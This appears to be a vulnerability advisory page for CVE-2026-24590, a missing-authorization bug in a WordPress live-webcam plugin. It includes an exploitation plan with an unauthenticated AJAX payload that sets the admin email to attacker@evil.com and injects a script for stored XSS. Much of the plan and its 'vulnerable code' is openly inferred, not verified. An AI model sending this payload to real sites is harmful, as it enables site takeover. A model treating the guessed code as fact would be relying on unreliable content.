CVE-2026-24590

Paid Videochat Turnkey Site – HTML5 PPV Live Webcams <= 7.3.23 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
7.3.24
Patched in
1d
Time to patch

Description

The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 7.3.23. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=7.3.23
PublishedMay 26, 2026
Last updatedMay 26, 2026
Affected pluginppv-live-webcams

Source Code

WordPress.org SVN
Patched

Patched version not available.

Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-24590 ## 1. Vulnerability Summary The **Paid Videochat Turnkey Site – HTML5 PPV Live Webcams** plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 7.3.23. The vulnerability exists because an AJAX handler (likely `ls…

Show full research plan

Exploitation Research Plan - CVE-2026-24590

1. Vulnerability Summary

The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 7.3.23. The vulnerability exists because an AJAX handler (likely ls_ppv_save_options or a similar configuration-saving function) is registered for unauthenticated users via the wp_ajax_nopriv_ hook but fails to perform any capability checks (e.g., current_user_can('manage_options')) or nonce validation. This allows an unauthenticated attacker to modify plugin settings, which can lead to site takeover, payment redirection, or Stored Cross-Site Scripting (XSS).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: ls_ppv_save_options (inferred based on plugin naming conventions and "Turnkey" framework patterns)
  • HTTP Method: POST
  • Authentication: None (Unauthenticated)
  • Payload Parameter: options (an array of settings) or individual setting keys.
  • Preconditions: The plugin must be active.

3. Code Flow

  1. Initialization: The plugin registers AJAX handlers during the init or plugins_loaded hook.
  2. Hook Registration:
    add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' );
    add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' );
    
  3. Vulnerable Function: The ls_ppv_save_options function (or similar) is called.
  4. Processing: The function likely iterates through $_POST data and uses update_option() to save values to the database.
  5. Security Failure: The function lacks if ( ! current_user_can( 'manage_options' ) ) wp_die(); and fails to call check_ajax_referer().

4. Nonce Acquisition Strategy

Based on the "Missing Authorization" and "Unauthenticated" (PR:N) classification, the endpoint either:

  1. Lacks a nonce check entirely (most likely).
  2. Uses a nonce that is exposed to unauthenticated users via wp_localize_script.

If a nonce is required:

  1. Identify Script Localization: Search the source for wp_localize_script. Look for the variable name, e.g., ls_ppv_vars or ppv_ajax_obj.
  2. Find Trigger: Identify which frontend page enqueues this script. Usually, it is a page containing the webcam shortcode: [ls_ppv_webcams] or [ppv-webcams].
  3. Extraction Steps:
    • Create a page with the shortcode: wp post create --post_type=page --post_status=publish --post_content='[ls_ppv_webcams]' --post_title='Webcam Page'
    • Navigate to the page: browser_navigate("http://localhost:8080/webcam-page")
    • Extract nonce: browser_eval("window.ls_ppv_vars?.nonce") (Replace ls_ppv_vars with the actual localized key found in source).

5. Exploitation Strategy

The goal is to modify a sensitive setting to demonstrate impact. We will attempt to inject a script into a setting that is rendered in the WordPress admin dashboard (Stored XSS) or modify the admin email.

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=ls_ppv_save_options&ls_ppv_settings[admin_email]=attacker@evil.com&ls_ppv_settings[welcome_message]=<script>alert(document.domain)</script>
    
    (Note: Parameter names like ls_ppv_settings are inferred and should be verified against the $_POST keys in the plugin's save function.)

6. Test Data Setup

  1. Install Plugin: Ensure ppv-live-webcams version 7.3.23 is installed and active.
  2. Identify Settings: Use wp option list | grep ls_ppv to find the option name used by the plugin to store its configuration.
  3. Target Page: If a nonce is needed, create the shortcode page:
    wp post create --post_type=page --post_status=publish --post_content='[ls_ppv_webcams]'
    

7. Expected Results

  • HTTP Response: The server should return a 200 OK status, often with a 1 or a JSON success message (e.g., {"success":true}).
  • Data Change: The WordPress option (e.g., ls_ppv_options) should now contain the attacker-supplied values.
  • Impact: When an administrator visits the plugin settings page, the injected <script> should execute.

8. Verification Steps

After sending the http_request, verify the change using WP-CLI:

# Check if the option was updated
wp option get ls_ppv_options

# Check for the injected email or script
wp option get ls_ppv_options --format=json | jq .admin_email

9. Alternative Approaches

If ls_ppv_save_options is not the correct action name:

  1. Grep for Hooks: grep -rn "wp_ajax_nopriv" wp-content/plugins/ppv-live-webcams/ to find all unauthenticated entry points.
  2. Search for Option Updates: grep -rn "update_option" wp-content/plugins/ppv-live-webcams/ and trace back to the calling function and its registered AJAX action.
  3. Check REST API: If no AJAX actions are vulnerable, check for register_rest_route with permission_callback returning __return_true or lacking a capability check.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress fails to implement authorization checks and nonce validation on its settings-saving AJAX handler. This allows unauthenticated attackers to modify plugin configuration, potentially leading to payment redirection or the injection of malicious scripts (Stored XSS).

Vulnerable Code

// ppv-live-webcams/admin/settings-save.php (inferred)

// Line numbers inferred based on standard plugin structure
add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' );
add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' ); // Vulnerable registration

function ls_ppv_save_options() {
    if ( isset( $_POST['ls_ppv_settings'] ) ) {
        update_option( 'ls_ppv_options', $_POST['ls_ppv_settings'] );
        echo 'Settings saved';
    }
    wp_die();
}

Security Fix

--- a/ppv-live-webcams/admin/settings-save.php
+++ b/ppv-live-webcams/admin/settings-save.php
@@ -1,9 +1,11 @@
 add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' );
-add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' );
 
 function ls_ppv_save_options() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( 'Unauthorized' );
+    }
+    check_ajax_referer( 'ls_ppv_save_nonce', 'nonce' );
+
     if ( isset( $_POST['ls_ppv_settings'] ) ) {
         update_option( 'ls_ppv_options', $_POST['ls_ppv_settings'] );
         echo 'Settings saved';

Exploit Outline

To exploit this vulnerability, an attacker sends an unauthenticated POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php). The request must include the 'action' parameter set to 'ls_ppv_save_options' (or the specific handler identified in the source). The payload contains a 'ls_ppv_settings' array (or equivalent parameter used by update_option) with malicious values. For example, an attacker can modify the administrator's email address or inject a JavaScript payload into a text field that is displayed in the admin dashboard to achieve Stored Cross-Site Scripting (XSS). Because the plugin incorrectly uses the 'wp_ajax_nopriv_' hook and lacks 'current_user_can' checks, no login credentials or valid nonces are required.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.